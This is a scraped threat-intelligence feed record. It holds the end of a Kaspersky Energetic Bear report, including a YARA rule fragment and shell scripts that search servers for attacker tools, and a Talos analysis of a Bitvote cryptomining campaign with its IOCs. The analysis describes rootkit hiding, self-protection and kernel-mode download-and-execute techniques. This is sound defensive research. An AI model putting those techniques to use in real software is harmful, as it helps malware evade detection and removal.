\nuint32(0) == 0x464c457f and filesize<1000000 and all of ($a*) \n}\n\n## Appendix II \u2013 Shell script to check a server for tools\n\n### Shell script for 
Debian\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \ndpkg -l | grep -E '(impacket|pcapy|nmap)' > dpkg-grep.txt #quote the pattern: with -E, backslash-escaped parentheses and pipes are matched literally and the alternation breaks \ncp /var/lib/dpkg/info/openssh-server.md5sums . #retrieve the packaged md5 for sshd (a root-level attacker can edit this file too, so compare with the distribution package if in doubt) \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual hash for sshd and compare it with the usr/sbin/sshd line in openssh-server.md5sums\n\n### Shell script for Centos\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \nrpm -qa | grep -E '(impacket|pcapy|nmap)' > rpm-grep.txt \nrpm -qa --dump | grep ssh > rpm-qa-dump.txt #retrieve initial hash for sshd from the rpm database (--dump takes two dashes) \nsha256sum /usr/sbin/sshd > sshd.sha256sum #calculate actual sha256 hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual md5 hash for sshd and compare both with the digest recorded in rpm-qa-dump.txt\n\n[ **Energetic Bear/Crouching Yeti: attacks on servers**](<https://ics-cert.kaspersky.com/media/EB_public_FINAL_EN_20042018.pdf>)", "reporter": "Kaspersky Lab ICS CERT", "published": "2018-04-23T10:00:36", "type": "securelist", "title": "Energetic Bear/Crouching Yeti: attacks on servers", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T10:00:36", "id": "SECURELIST:5120B9325810A974F19B2E365EC8516C", "href": "https://securelist.com/energetic-bear-crouching-yeti/85345/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": 
"2018-04-24T14:41:40", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "### Executive summary\n\n \nSoon after a launch of a new cryptocurrency, Bitvote, in January, Talos discovered a new mining campaign affecting systems in India, Indonesia, Vietnam and several other countries that were tied to Bitvote. \n \nApart from the fact that the attackers have chosen to target the new bitcoin fork in order to gain the early adoption advantage, this campaign is notable for its usage of a kernel-mode driver to manage command and control (C2) infrastructure, configuration management, download and execute functionality, as well as payload protection. It is quite uncommon to implement this functionality in kernel, apart from the payload protection, and points to a moderate to high level of technical knowledge behind the attack. \n \nThe payloads and the configuration were embedded in specially modified animated GIF files and published as parts of web pages hosted on free blogging platforms. \n \nThe campaign was active in February and March, and so far, it has brought limited returns for attackers. \n \n \n \n\n\n### Introduction\n\n \nOne of the benefits of open-source projects is the ability for other people to create so-called \"forks\" \u2014 copies of the original source code repository and to essentially split (fork) the development process in two by creating a separate project with a new development team and a separate development process. \n \nForks also happen with cryptocurrencies. Since the initial release of bitcoin, there has been more than 18,000 forks of bitcoin code on the hosting service GitHub, although only a few of them have successfully been launched as alternatives to bitcoin. \n \nWhile some, such as Bitcoin Cash, Bitcoin Gold or Litecoin have been fairly successful, most new forks die out without being noticed by a significant number of users. 
\n \nA frequent reason that forks are created is to improve on the so-called \"one-CPU-one-vote\" principle, which prescribes rules on how the network decides on a transaction's validity. In the original plan laid out by [Bitcoin creator Satoshi Nakamoto](<https://www.google.com/url?q=https://bitcoin.org/bitcoin.pdf&sa=D&ust=1524498497022000>), the miner is awarded proportionally to the amount of computing resources they invested, without explicit mention of the type of hardware that should be used for mining. However, some people took the \"one-CPU-one-vote\" principle \u2014 quite literally \u2014 to mean that desktop CPUs should exclusively be used for mining. \n \nNevertheless, the original practice of bitcoin mining has moved away from using standard desktop system CPUs and GPUs, and into the realm of specialized ASIC-based hardware systems, requiring a significant up-front investment to achieve notable returns for miners. \n \nThis development has seen many home users moving away from mining bitcoin into mining other currencies such as Monero, which is specifically designed to make mining using ASIC more difficult. Monero also increasingly became the currency of choice for malicious mining botnets, which we already covered in [one of our recent blog posts](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1524498497023000>). \n \nOn Jan. 20, an unknown group of developers launched a new bitcoin fork called [Bitvote](<https://www.google.com/url?q=https://bitvote.one/&sa=D&ust=1524498497024000>), with their own view on how to improve on the \"one-CPU-one-vote\" principle, and give desktop users a fairer chance to successfully mine a cryptocurrency. \n \nBitvote uses the [Cryptonight](<https://www.google.com/url?q=https://en.bitcoin.it/wiki/CryptoNight&sa=D&ust=1524498497024000>) algorithm for its proof of work, which is also used by Monero. 
The algorithm is designed to allow standard desktop CPUs to be equal participants in the mining process. \n \nAs cyber criminals move farther away from ransomware, and closer to cryptocurrency mining, it comes as no surprise to find out that a malicious actor decided to take a gamble on Bitvote, and developed a malicious campaign that resulted in the infection of hundreds of systems with a modified version of the cpuminer mining software, recruiting the affected systems into a Bitvote mining pool. \n \nThis post is focused on the driver functionality of Bitvote, although we briefly describe the dropper, as well as the final cryptocurrency mining payload used in this campaign. \n \n\n\n### Calculator with unexpected functionality: The dropper\n\n \nA driver dropper, purporting to be a calculator application was found by investigating [AMP for Endpoints](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html&sa=D&ust=1524498497025000>) product telemetry. The dropper was spotted in the wild, and blocked on Feb. 6. It is likely to have been a part of a (potentially) unwanted application installer published on sites hosting an alleged version of Microsoft Toolkit, which should allow the user to activate different versions of Microsoft Office and Windows without owning a valid license. \n \nA Microsoft Toolkit bundler installs many potentially unwanted applications (PUAs), but it also installs a file calculator<nnnn>.exe that drops a randomly named kernel mode driver. Earlier calculator dropper variants have been around at least since the last quarter of 2017. \n \nTypically, the malicious functionality of the dropper (written using MFC framework) is to install the driver in the <Windows>\\system32\\drivers folder with eight random characters' base filename (eg. djkeuihk.sys), or with the original name of the driver, which is DrToolKrl.sys. 
After creating the driver, the dropper creates a Windows service with the same name as the driver file and loads the driver into kernel memory by starting the service.\n \nBefore dropping the driver, the dropper checks if it is executing in a virtual machine environment, under the control of a debugger or in a sandbox. If a virtual machine environment is detected, the malicious driver is not dropped, and the execution continues with the calculator functionality.\n \n\n\n[](<https://2.bp.blogspot.com/--4fRvFciEpg/Wt31CTvxk5I/AAAAAAAAAHA/xD9k7Mw5EO4-LPHQCHAB96WzjI_bfN9GwCLcBGAs/s1600/image5.gif>)\n\nTrojanized Calculator GUI\n\n \nThe dropper checks for the following environments: \n \n\n\n * Parallels\n * VMWare\n * VirtualBox\n * JoeBox\n * GFI Sandbox (CWSandbox)\n * Anubis\n * Sandboxie\n * Debugging Tools for Windows\n \n \nIf a debugging or analysis environment is not detected, the dropper checks the version of the operating system in order to drop an appropriate, 32- or 64-bit version of the rootkit driver. It also attempts to communicate with the driver in order to make sure that the driver is not already loaded. \n \n\n\n[](<https://4.bp.blogspot.com/-GLkOgm74tzE/Wt31VngNS0I/AAAAAAAAAHI/m-WBmEQj3cgY6qzHn4TGwor2wwp1PwljgCLcBGAs/s1600/image3.png>)\n\nCheck for the bitness of the operating system and prepare to drop a driver\n\n \n\n\n### Main culprit: The driver\n\n \nThe driver is signed with a certificate belonging to \"Jiangsu innovation safety assessment Co., Ltd.\" with an expired validity period. This means that it will not be loaded by Windows Vista and later versions of 64-bit Windows, which enforce valid driver signatures. On the one hand, this seems like a failure of the attacker's process, as the attack can only target older Windows versions, likely executing on less capable CPUs. 
On the other hand, it may prove to be an advantage for the attacker, as it is more likely that older systems are not fully up to date and protected with the latest security software. Therefore, this attack is less likely to be discovered if only older CPUs are affected. \n \nThe driver contains the functionality to: \n \n\n\n * Manage configuration of the C2 infrastructure\n * Parse configuration files hosted on free blogging platforms to decode the information hidden in animated GIF files published as part of the C2 blogs.\n * Download and execute the final payload (in our case, the Bitvote pool miner agent)\n * Protect the driver from deletion\n * Protect the driver registry entry from third-party access (read and write)\n * Protect payload processes and threads from termination\n * Download and install new driver versions \n * Disable the User Account Control (UAC)\n \n \nApart from the core driver's ability to protect itself and its payload, the driver somewhat unusually contains the download and execute functionalities, which is rarely implemented in kernel mode by well-known malware downloader families. \n \nThis indicates an increased level of proficiency of the author of the driver, who might also be the actor behind this Bitvote mining operation. \n \nHowever, it is also possible that the driver is created by a generic third party toolkit, which would allow an actor to specify configuration and payload URLs in a simple way. Once the configuration is specified, the toolkit might be used to build and sign the driver, which could also explain the fact that the driver samples were signed with an expired certificate. However, we were not able to find generator samples that would confirm this theory. \n \n\n\n#### Configuration management\n\n \nThe driver initially contained several hardcoded URLs pointing to free blogging platforms, such as Blogspot (Blogger) and Russian blogging platform LiveJournal. 
Before the hardcoded URLs are accessed, the dropper attempts to download a GIF file from a special URL hardcoded in the dropper body. \n \nThe downloaded GIF file contains an encrypted data blob at offset 0xA0000, with a driver configuration block including the new command and control locations, as well as updated URLs for downloads of payloads. The configuration data block starts with a header containing a magic double word 'lKTD' ('DTKl'), followed by a double word containing a simple addition-based checksum of all bytes in decoded configuration, a static double word XOR decryption key and a double word count of configuration records within the block. \n \n\n\n[](<https://4.bp.blogspot.com/-s5HqSofLj0U/Wt31oGUyk9I/AAAAAAAAAHQ/FU7Fat-AXNk8WEAgYHzBT2GA5d9H16dtgCLcBGAs/s1600/image13.png>)\n\nDownload and decode driver configuration\n\n \nEach configuration record size is 407 bytes long, and contains a type of the record, which may indicate a payload record, a driver update record or C2 record, followed by a URL, as well as pointers to HTML parsing functions, the local file paths and arguments that should be used when they are launched. \n \nThe configuration is decoded and loaded into the DeviceExtension block of the device object created by the driver in the DriverEntry function. The device extension block is the most important data structure associated with a device object. Its internal structure is driver-defined, and it is typically used to maintain device state information and provide storage for any kernel-defined objects. In our case, the DeviceExtension also stores the in-memory configuration of the malicious driver. \n \n\n\n[](<https://1.bp.blogspot.com/-DBuptSJpLFc/Wt4KCmWsjSI/AAAAAAAAAI8/eWU0sC4sKEINXLsLgFSSHYxSUsMkeHbAwCLcBGAs/s1600/image15a.png>)\n\nThe GIF containing the driver configuration\n\n \nThe IP address of any host is resolved by querying Google's DNS resolver 8.8.8.8. 
Defenders are advised to block direct traffic from standard internal network endpoints to external DNS resolvers, which would prevent the driver from downloading and executing payloads, as well as connecting to the botnet C2 servers, internally referred to as the \"Heart servers.\" \n \nThe host used as the Heart server in this campaign was cdn[.]rmb666[.]me. At the time of the analysis, the domain name resolved to 185.180.14.16, which is also associated with other malicious domains. The domain was registered on Dec. 20, 2017, and it seems to have been used specifically for this campaign. The IP address is hosted in the Czech Republic. The domain has now changed provider, and it points to 91.213.8.57, an IP address hosted in Ukraine. \n \nThe country graph taken from the Cisco Umbrella Investigate tool indicates that the campaign was most active in Indonesia, with many other countries, such as India, Algeria and Vietnam, also affected. \n \n\n\n[](<https://2.bp.blogspot.com/-4KYWSG13N8c/Wt31_m4YQ4I/AAAAAAAAAHc/LE6DZSSUx70Q4Fhm8Zo-Kept7kbEYxvkACLcBGAs/s1600/image4.png>)\n\nThe top affected countries are Indonesia and India\n\n \nThe driver uses a fairly specific User-Agent string 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/520.16 (KHTML, like Gecko) Chrome/61 Safari/517' when posting the initial data to the C2 server, which may be a good network detection indicator. \n \n\n\n[](<https://4.bp.blogspot.com/-phwqkya8Bbo/Wt32WBZlnvI/AAAAAAAAAHo/rgUGRlL9jScY1nOzaX-UFhRWV23Y5yE_wCLcBGAs/s1600/image7.png>)\n\nInitial Heart server post request example\n\n \n\n\n#### Download and execute functionality\n\n \nOnce the configuration is loaded, the driver loops over the records and attempts to access the specified URLs. If a URL hosts an HTML file, the driver will parse the page to find an image URL which satisfies the criteria set in the associated HTML parsing function. \n \nIf a target image URL is found, the driver will download the image file. 
The downloaded image files were GIF images with a PE executable payload simply appended to them. The driver then extracts the payload from the image, saves the payload into a destination path set by the configuration record and executes it by switching the process context to Windows Explorer (explorer.exe) and launching the downloaded file using the standard WinExec Windows API function. \n \nThe driver finds the Windows Explorer process identifier (PID) by calling the ZwQuerySystemInformation API to obtain an array of SYSTEM_PROCESS_INFORMATION structures, one for each process in the system. \n \n\n\n[](<https://4.bp.blogspot.com/-IeDkSHJ4uNw/Wt32hMDnBhI/AAAAAAAAAHs/FNinPYtYwVYoGf1QBnOpkHiBoWGQ4fVoACLcBGAs/s1600/image10.png>)\n\nExecute the payload in the context of \"explorer.exe\"\n\n \n\n\n#### Driver protection \n\n \nApart from the core 'download and execute' functionality, the driver implements several protection techniques to protect the driver's file, its own in-memory configuration, its service and the payload process. \n \nTo protect itself, the driver stores its own image and the configuration records within a registry key, and if the original driver is removed from the disk or modified, the modified file is replaced by the original driver, or a new driver copy is created. \n \nIf the driver is not able to restore itself into the old location, it generates a new random eight-character base name, saves the original version of the driver into the newly generated path and creates a new service to point to it. \n \nThe configuration is stored in the DataInfo value of the registry key used by the driver service. For example: \\HKLM\\System\\CurrentControlSet\\Services\\kemamiti\\DataInfo. The service registry key is protected by the driver, and access to it is not allowed as long as the driver is active in memory. 
\n \n\n\n[](<https://4.bp.blogspot.com/-THCL4Uh8zG0/Wt32rhlWmmI/AAAAAAAAAH0/HIgCGOUAm-QyVGHnnPubzzPskQWQ2N2wwCLcBGAs/s1600/image14.png>)\n\nAccess to the driver services registry key is denied by the driver\n\n \n\n\n#### Hiding the driver\n\n \nThe driver attempts to hide by removing itself from the InLoadOrderLinks linked list of loaded modules. The driver accesses its own _DRIVER_OBJECT object DriverSection pointer, which points to an area with a _LDR_DATA_TABLE_ENTRY structure, used to keep the information about the loaded module. \n \nThe driver is removed from the InLoadOrder linked list by modifying both the Flink (forward link) member of the previous list member and Blink (backward link) of the next list member. \n \nThe driver also zeroes out the DriverName field of the _DRIVER_OBJECT object as well as FullDllName field in the _LDR_DATA_TABLE_ENTRY structure. \n \n\n\n[](<https://4.bp.blogspot.com/-mGG1_wyg9LQ/Wt325r36FsI/AAAAAAAAAH8/HKovhJiPeWIuKyYlGRz1U7hJp1HycxB6ACLcBGAs/s1600/image8.png>)\n\nThe driver zeroes out its name but BaseDllName still remains\n\n \nThis way, the name of the driver module is not displayed when the loaded module lists are examined by many utilities. For example, if we use the WinDbg extension [SwishDbgExt](<https://www.google.com/url?q=https://github.com/comaeio/SwishDbgExt&sa=D&ust=1524498497038000>), developed by Matthieu Suiche, to display kernel callbacks, the driver module name will not be displayed, although we can still follow hyperlinks to disassemble and analyze the callback code. \n \n\n\n[](<https://1.bp.blogspot.com/-X9yuDLB8b_w/Wt33JVgFWAI/AAAAAAAAAII/U4quHx4fs7QLwqnhwymMqOqPA-MkBldmgCLcBGAs/s1600/image6.png>)\n\nThe driver module name is not assigned to callbacks after zeroing out\n\n \n\n\n#### Payload process protection\n\n \nApart from protection of the module and its registry entries, the driver protects the payload process from termination and respawns the process if all of its threads are terminated. 
This is achieved using one of the documented kernel mechanisms and registering object callbacks, allowing the user to supply functions, which will be called by the kernel when the registered kernel event, such as opening a process, is triggered. \n \nThe protection of the process is implemented by calling the [ObRegisterCallbacks](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-obregistercallbacks&sa=D&ust=1524498497039000>) for process objects. When the kernel initiates a callback, the rootkit changes the DesiredAccess mask in order to prevent other processes from terminating the payload. \n \nThere is some additional filtering, and if the process creating a handle to the payload is not explorer.exe or csrss.exe, the process will be unable to terminate the payload. \n \n\n\n[](<https://1.bp.blogspot.com/-gutR6iECe1Q/Wt33TNJ-9LI/AAAAAAAAAIM/qyQJcmyM14QFlH-DfDIMB-LHGUYM3v10ACLcBGAs/s1600/image12.png>)\n\nAccess to the payload process is denied by the driver\n\n \n\n\n#### System callbacks\n\n \nWhen Windows kernel mode rootkits appeared, they used to hook undocumented operating system structures and tables such as System Service Dispatch table (SSDT) or Interrupt Descriptor table (IDT) but today, they typically use documented interfaces, such as system callbacks, in order to avoid detection by Windows kernel security mechanisms. \n \nOur driver sample is also aware of Windows protection mechanisms, and it uses documented callbacks in order to register functions for its own protection. 
\n \nThe list of used functions for registering callbacks is: \n \n\n\n * [CmRegisterCallback](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-cmregistercallback&sa=D&ust=1524498497042000>) \\- Registry callback for protection of registry values\n * [PsSetCreateProcessNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine&sa=D&ust=1524498497043000>) \\- respawning the payload if the payload process is terminated\n * [PsSetLoadImageNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetloadimagenotifyroutine&sa=D&ust=1524498497043000>) \\- to disable User Account Control\n * [PsSetCreateThreadNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine&sa=D&ust=1524498497044000>) \\- registry and driver file protection\n * ObRegisterCallbacks - to protect the payload from termination\n\n### Final payload - the miner\n\n \nThe final payload is a modified cpuminer application downloaded into <Windows>\\winserv,exe. The miner is modified to automatically connect to a btv.vvpool.com site using TCP port 5700 and join a Bitvote mining pool. The application seems to be a minor modification of an open-source cryptocurrency miner cpuminer, and it does not warrant further investigation. \n \n\n\n[](<https://2.bp.blogspot.com/-Lnq0aPsbsBo/Wt33cTd7WhI/AAAAAAAAAIU/2h_-VX3KO00EPlyS0VveEghgX1RMejdYACLcBGAs/s1600/image9.png>)\n\nThe miner connects to the pool at TCP port 5700 and sends its address\n\n \nAt the time of writing, we could see that the mining operation has been able to earn just over 4,400 BTV, close to $1,500. 
This is easily checked using the [Bitvote block explorer](<https://www.google.com/url?q=https://block.bitvote.one/&sa=D&ust=1524498497045000>), and searching for transactions to the address 1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB, belonging to the botnet. \n \n\n\n[](<https://2.bp.blogspot.com/--YVCKUF4GqA/Wt33o0OjZhI/AAAAAAAAAIc/hCYm9OUCfDcjX5LpzfArSdhM3lhnsmodgCLcBGAs/s1600/image1.png>)\n\nDespite the moderate botnet size, the attackers earned more than $1,500.\n\n \nThe top hash rate of 340 Khash/s indicates around 2,500 bots participating in the mining activity, assuming an average CPU generates around 125 hashes per second. It seems like attackers were betting on BTV, but the payback would be much higher if they attempted to mine another, more established cryptocurrency such as Monero. \n \n\n\n[](<https://4.bp.blogspot.com/-TytQ7yVHSrY/Wt33wmHUEdI/AAAAAAAAAIg/1TBhxpQokIg7yZYwLWCZwk4OmfrnXvC8QCLcBGAs/s1600/image2.png>)\n\nAfter a high initial hashrate the activity quickly dropped to 12Khash/s\n\n \nThe mining activity started its operation on Feb. 16, which can be seen in the [stats available](<https://www.google.com/url?q=http://www.vvpool.com/bitvote/1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB&sa=D&ust=1524498497047000>) on the vvpool.com website. \n \n\n\n### Conclusion\n\n \nWith the difficulties and unpredictability associated with the recent widespread ransomware attacks, it is not surprising that cyber criminals are turning toward mining cryptocurrencies. Besides well-established cryptocurrencies such as Monero, malicious actors are also becoming early adopters of newly created cryptocurrencies. Bitvote is just one of these, created as a bitcoin fork and launched on Jan. 20. The attackers created trojanized calculator applications with the intention of creating a large pool of infected machines to mine Bitvote. 
\n \nApart from targeting a newly created cryptocurrency, this campaign is notable for using a kernel mode driver deployed in order to provide the complete infrastructure for the final payload, from downloading the payload and reloading the malware configuration to hiding and protecting the malicious modules from detection and removal. \n \nUsing a kernel mode driver is quite an unusual method for everyday malware campaigns, and requires at least moderate technical knowledge on the part of the developers. The fact that the certificate used to sign the driver has an expired validity period points to a possible intention of attackers to target geographic regions with a smaller proportion of the latest operating systems in the user base. \n \nAlthough this newly created cryptocurrency provided only limited returns, we can expect attackers to continue this trend in the future as more cryptocurrencies opt to allow mining with commodity desktop CPUs. \n \n\n\n### Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-7SCmIdro4lw/Wt337hTmLiI/AAAAAAAAAIo/kqDhFY4-9qAoQmILrtOaYmRJaLoOdVnFACLcBGAs/s1600/image11.png>)\n\n \n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1524498497049000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \n[CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1524498497050000>) or [WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1524498497050000>) web scanning prevents access to malicious websites and detects malware used in these attacks. 
\n \n[Email Security](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html&sa=D&ust=1524498497051000>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497051000>)[NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497052000>),[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>)[NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>), and[ ](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>)[Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1524498497054000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1524498497054000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1524498497055000>). 
\n \n\n\n### \n\n \n\n\n### IOCs\n\n \n\n\n#### Drivers\n\n \nd90ebf52ad16db60949af988c24a9aaf59994836998ddefb7eadb7b26cecf05c \n7dc5f6e0296213b95ac6bbf07812987f681e933de8c41fef43789d01a410e320 \nb2c497662c1fd004ad97173c95740ee89490dfe34cfae5c898461c108f6539cd \n87cdfc90ded55e83948e54ef2d20d78c1ef9d78a8a018c01aa80645fb7eb33ce \n838d62a9d978ca5dfbeef50636df6a05ac0377d245b3b9df931a2c2ddb8b9f28 \nea828b2250825e3530fa6a889b71aba5fe52bf1aa70cc240b5208fcd57490912 \n9c45bf161947c7dd7aead23c2de4e806a7e260bd61be99eda0ce674f831c414f \n6e9bc99005f7070acd58c873caddcd3fe256bd281f1e7dfb81fbcc4fcdafeddd \n19f42d8d1a2b57058f38d62246cb1b7128c43060d2c504d2a52f4ef62e63e1fe \na7c7f4b1751857c4e44b4a81666e10e73808294b9bdbfd9be18865b4612a370e \nf514319a8677fa29f0b2179d91fd7b190402de5bc87aca48b1ed2e96ab56905a \nd81c1d5f21e66f8fc49123dffb11d23c3d7531a922a7e060dc9455c92cdb8008 \nd3c30f7339374d96c99df11cb4bbd944f11593a416cb5a67188c0f87e30d6054 \n0e92454df699cea60df2ca1620ced9ca8e0bec8c6f4424df62b1b8c5e4b2167f \ncb48cefc8cdd4856f800b80ab7bb2dd98a5f3e2e83ec11d89f138ef259c324db \nd2323e3e850733b32cc72d6f9527181af1e1f13d24fa2bc4e2c2cc14bf148d70 \n962c723b17d35b83ec52801be82bce4c2ce936c2bc57c82112958b0d32c9db97 \nab0b53890ecc5c85f050b18564b953895daec8db75652100639da49a71e538ff \n708db4511cb78329caaa50b69ed07ec28208a3bd05aea25f47fe5fe0ae5e2592 \nc81d032fba5e178b7a264b301aec4399375067fa22ca85a0ab3eef4d06f3cdb0 \nfff7ba34752cf2ed8e934b826235ea66a701b6a79f15c4e88e692c91e12941fa \n934b7cce2c370b5bfcd462e33e55aa45cc25c588361fdb32e7a2670a3acef0e2 \nec37f13a40eac500eece7904885ace72ca66fa015293159bba2a33992d2d2a6e \n28ed8326bb1c4099e2bd88973e73c4464a46bb35952b4490f7be165491b40da6 \n0d8969db5bda666b92de13bc0033344ee489c340e02c2667e6fd5a924d52d20c \n \n\n\n#### Droppers (CalculatorXXXX.exe)\n\n \n66908c744a11db8d72ad0b95c41de9fa13cc996c17884a3b39e8fdcd4fee20ee \nf98f23c223a498c5687af84cd6c17b853a0abb0458d5606e5b62a3e75b1dbab6 \n019426698cb1cc733024c38d0d09ff5dcac1ad9cf81d26c092a278f72f131e59 
\n04de0bcd0f61a38f7ffd59c8fb369616a1648e65ea717994dbbef7db1bb6df1d \n051825abb810183939cc00055eb841ba4c319c46fbacf30cc2b6ac60fb3305f8 \n0ace52b5d1847f2fea1f6db75e69215176017d98d113fd7860eab89607e6c955 \n1648ee9890f17f19b45c751f3bcf898267c7b8a3bb5188138f65b1857e8c9985 \n1f634c71be6f0615facd7364ed2edb50b388d75ff26e486addafc40ee0f95d89 \n3163a93a00d5e6c6de4d2d57a4badab0f33c5f27016f3685e5cfd83d0de759dd \n32e2f73faf2f8acb68b373ae61cdcb0a72d168be85102e520690bfd64840bb59 \n4eeb22623b78909c1b6179ce47d1c5130b88d381ba86dc51886b78c03476c2dd \n551fd86f19d1980696622dd4cf2535573b8a66f3e4fb0155f8dac919f1f50488 \n6bde69fb7d35fac40d6e108ce610401eb08c5fc69a481d4cb03483ee3cd9705e \n76d419d9a9d047ef19058496bb64c8caf2456a8d76f45a0523b7a5fdce21dd40 \n7e41a9427e27e980578e59698d4f7f88c649e355eb26bbd549973f1ca7355828 \n806742372cb0f4fc8a64b15b186e78cea1459f970b5620e2bcfdcd73db2d6fa6 \na94a8cbe146fb4f66ba907c1d40fdda916c8ecd0fa0d7114814a25565ac96aa2 \nd6fce2bd96498333feb43404a34ce826ee915fa30785a18ec3c7b15b6ae924a9 \ndb25a7265029188d4d39cb5654c9ca558302fb0ddb3de081e53300122c8a3c2c \ne2da5b82da75be16640774128af067ac608515bd7a3c32082ae89c3967048c20 \ne4c0c999af4abf99f6afa21c991357aff3c1eae1f424df3a2c307bb578fdbbf0 \nea6226fcb7adf1ad57f2e64c99d735e7cb54063b5bed970c5fd75a9e55f7bf1a \n \n\n\n#### Dropper Toolkit\n\n \n\n\n8185b8a3629dc1fb5090a12f0418ce91ee1908117487e3316f96ba17fa64a5db \n \n\n\n#### Modified Bitvote cpuminer\n\n \n\n\n87c27f08d1eaa1ad2addd6af381829c037d55186ceded7249d5af0a62e464032 \n \n\n\n#### Domains for configuration downloads\n\n \n\n\nhxxp://image.bcn2018.com/ \nhxxp://image.cheap2019.com/ \nhxxp://image.docu2018.com/ \nhxxp://image.gxb2018.com/ \nhxxp://image.japchn2018.com/ \nhxxp://image.pply2018.com/ \nhxxp://image.succe2018.com/ \nhxxp://image.yyxp2019.com/ \nhxxp://img.rmb777.me/ \n \n\n\n#### Hardcoded Urls for downloads of payloads and newer driver versions (may be superseded by the new configuration downloaded from configurations sites) \n\n 
\nhxxp://1022k.blogspot.com/2018/02/1022s.html \nhxxp://7mlftakc3qt48.livejournal.com/721.html \nhxxp://bbx2018.blogspot.com/2018/02/1026i.html \nhxxp://bct2018.blogspot.com/2018/02/1027i.html \nhxxp://btv2018.blogspot.com/2018/02/blog-post.html \nhxxp://check2018.livejournal.com/517.html \nhxxp://earthjor.livejournal.com/721.html \nhxxp://gba2019.livejournal.com/767.html \nhxxp://hbrhzuds1199.livejournal.com/799.html \nhxxp://hrb2019.livejournal.com/620.html \nhxxp://iphone2019.livejournal.com/635.html \nhxxp://kawakaw.livejournal.com/594.html \nhxxp://livegoogle.livejournal.com/546.html \nhxxp://lovejoin2019.blogspot.com/2018/02/1031.html \nhxxp://myinsterschool.blogspot.com/2018/02/1032.html \nhxxp://myqnewworld.blogspot.com/2018/02/1030.html \nhxxp://nha2019.livejournal.com/749.html \nhxxp://talkto2018.livejournal.com/518.html \nhxxp://tpshadow66655.livejournal.com/545.html \nhxxp://xabx2019.livejournal.com/559.html \nhxxp://xmr1022.livejournal.com/763.html \nhxxp://xmr1022x.livejournal.com/656.html \nhxxp://xmr2019.blogspot.com/2018/01/1021s.html \nhxxp://xmr2019.blogspot.com/2018/01/my-sister.html \nhxxp://xmr2019.livejournal.com/1165.html \nhxxp://xmr2019.livejournal.com/748.html \n \n\n\n#### URLs for C2\n\n \n\n\nhxxp://down.rmb666.me/dr.php \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=5RBkUbicJr4:JpZ4ckZod20:yIl2AUoC8zA>)\n\n", 